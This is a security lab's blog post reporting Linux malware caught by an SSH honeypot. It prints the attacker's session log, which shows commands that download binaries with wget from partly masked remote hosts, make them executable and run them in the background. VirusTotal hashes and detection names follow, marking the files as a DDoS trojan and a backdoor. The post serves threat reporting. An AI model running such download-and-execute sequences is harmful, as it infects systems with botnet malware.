• Home
  • Services
  • About Us
  • Blog
  • Contacts

New fresh Linux malware harvested from our SSH honeypot

6 years ago
pcsl_admin
No Comments

Our ssh honeypot recorded a fresh ssh attack and here is the log:

[0x0000655b],[0x00007f2079700780],[info],[0],session username:xxxxxxx password:xxxxxxx
[0x0000655b],[0x00007f2079700780],[notification],[1],login successful
[0x0000655b],[0x00007f2079700780],[notification],[2],log name /opt/Debug/xxxx.log
[0x0000655b],[0x00007f2079700780],[notification],[3],Opened Shell
[0x0000655b],[0x00007f2079700780],[info],[4],$
[0x0000655b],[0x00007f2079700780],[info],[5],stdin write
[0x0000655b],[0x00007f2079700780],[info],[6],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[7],wget http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[8],–2017-02-12 15:48:27–  http://xxx.xxx.248.189:281/c32
[0x0000655b],[0x00007f2079700780],[info],[9],
正在连接 xxx.xxx.248.189:281…
[0x0000655b],[0x00007f2079700780],[info],[10],stdin write
[0x0000655b],[0x00007f2079700780],[info],[11],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[12],chmod 777 c32
[0x0000655b],[0x00007f2079700780],[info],[13],stdin write
[0x0000655b],[0x00007f2079700780],[info],[14],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[15],chmod +x c32
[0x0000655b],[0x00007f2079700780],[info],[16],stdin write
[0x0000655b],[0x00007f2079700780],[info],[17],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[18],nohup ./c32 &
[0x0000655b],[0x00007f2079700780],[info],[19],stdin write
[0x0000655b],[0x00007f2079700780],[info],[20],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[21],./c32 &
[0x0000655b],[0x00007f2079700780],[info],[22],stdin write
[0x0000655b],[0x00007f2079700780],[info],[23],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[24],cd /tmp
[0x0000655b],[0x00007f2079700780],[info],[25],stdin write
[0x0000655b],[0x00007f2079700780],[info],[26],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[27],wget http://xxx.xxx.248.71:2/xmxm
[0x0000655b],[0x00007f2079700780],[info],[28],stdin write
[0x0000655b],[0x00007f2079700780],[info],[29],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[30],chmod 777 xmxm
[0x0000655b],[0x00007f2079700780],[info],[31],stdin write
[0x0000655b],[0x00007f2079700780],[info],[32],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[33],nohup xmxm &
[0x0000655b],[0x00007f2079700780],[info],[34],stdin write
[0x0000655b],[0x00007f2079700780],[info],[35],./xmxm &
[0x0000655b],[0x00007f2079700780],[info],[36],./xmxm &

The two new samples:

The file c32 is new to virustotal and here is the link:

https://www.virustotal.com/en/file/7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75/analysis/

SHA256: 7939736761004fcfd0210cce4b8a24a84b3b72b3f223af0643a0f1b75cf3da75
File name: c32
Detection ratio: 6 / 54
Analysis date: 2017-02-12 15:21:14 UTC ( 49 minutes ago )
Antivirus Result Update
AVG Linux/ChinaZ 20170212
AegisLab Troj.Ddos.Linux!c 20170212
Avira (no cloud) LINUX/DnsAmp.zifrw 20170212
ESET-NOD32 a variant of Linux/Dnsamp.J 20170212
Kaspersky HEUR:Trojan-DDoS.Linux.Kluh.a 20170212
Qihoo-360 Win32/Trojan.DDoS.526 20170212

The file xmxm is also new to virustotal and here is the link:

https://www.virustotal.com/en/file/b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824/analysis/

SHA256: b28813d81653831faf5b046ccb1a4ff87528586ecf3a2424c03871e47bf9b824
Detection ratio: 32 / 55
Analysis date: 2017-02-11 20:05:04 UTC ( 20 hours, 9 minutes ago )
Antivirus Result Update
ALYac Trojan.Agent.Linux.A 20170211
AVG Linux/BackDoor_c.CL 20170211
Ad-Aware Trojan.Agent.Linux.A 20170211
AhnLab-V3 Linux/Backdoor.1223123.B 20170211
Antiy-AVL Trojan[Backdoor]/Linux.Ganiw.a 20170211
Arcabit Trojan.Agent.Linux.A 20170211
Avast ELF:Elknot-AE [Trj] 20170211
Avira (no cloud) LINUX/Setag.kzmdl 20170211
BitDefender Trojan.Agent.Linux.A 20170211
CAT-QuickHeal Backdoor.Linux.Setag.E 20170211
ClamAV Unix.Trojan.Agent-37008 20170211
DrWeb Linux.BackDoor.Gates.9 20170211
ESET-NOD32 Linux/Setag.B.Gen 20170211
Emsisoft Trojan.Agent.Linux.A (B) 20170211
F-Secure Trojan.Agent.Linux.A 20170211
Fortinet ELF/Ganiw.A!tr 20170211
GData Trojan.Agent.Linux.A 20170211
Ikarus Trojan.Linux.Setag 20170211
Jiangmin Backdoor/Linux.io 20170211
Kaspersky HEUR:Backdoor.Linux.Ganiw.d 20170211
McAfee Linux/Gates 20170211
McAfee-GW-Edition Linux/Gates 20170211
eScan Trojan.Agent.Linux.A 20170211
Microsoft Backdoor:Linux/Setag!rfn 20170211
NANO-Antivirus Trojan.Unix.Ganiw.ditcrf 20170210
Qihoo-360 virus.elf.ddos.f 20170211
Rising Backdoor.Setag/Linux!1.A3E5 (classic) 20170211
Sophos Linux/DDoS-BD 20170211
Symantec Linux.Chikdos.B!gen2 20170211
TrendMicro ELF_SETAG.SM 20170211
TrendMicro-HouseCall ELF_SETAG.SM 20170211
Zillya Trojan.Agent.Linux.12 20170210

 

 

Previous Post
Android malware detection test execution schedules 2017
Next Post
Android Security Product Certificate (NO. 20181118A) – OnVaccine@INetCop
You must be logged in to post a comment.

Recent Posts

  • Certification criteria for a valid and high-performance anti malware product
  • Blue Hexagon Earns Perfect Score in Network Threat Protection Test by PCSL. Achieves 100% detection efficacy, 0% false positive rate.
  • Android Security Product Certificate (NO. 20190109A) – T-Guard@SK Telecom CO., Ltd
  • Android Security Product Certificate (NO. 20181118A) – OnVaccine@INetCop
  • New fresh Linux malware harvested from our SSH honeypot

Recent Comments

    Archives

    • November 2019
    • October 2019
    • January 2019
    • November 2018
    • February 2017

    Categories

    • Data_feeds
    • Test

    Meta

    • Log in
    • Entries feed
    • Comments feed
    • WordPress.org

    © 2008-2019 All rights reserved. Jiaxing Chenxiang Information Technology Co., Ltd.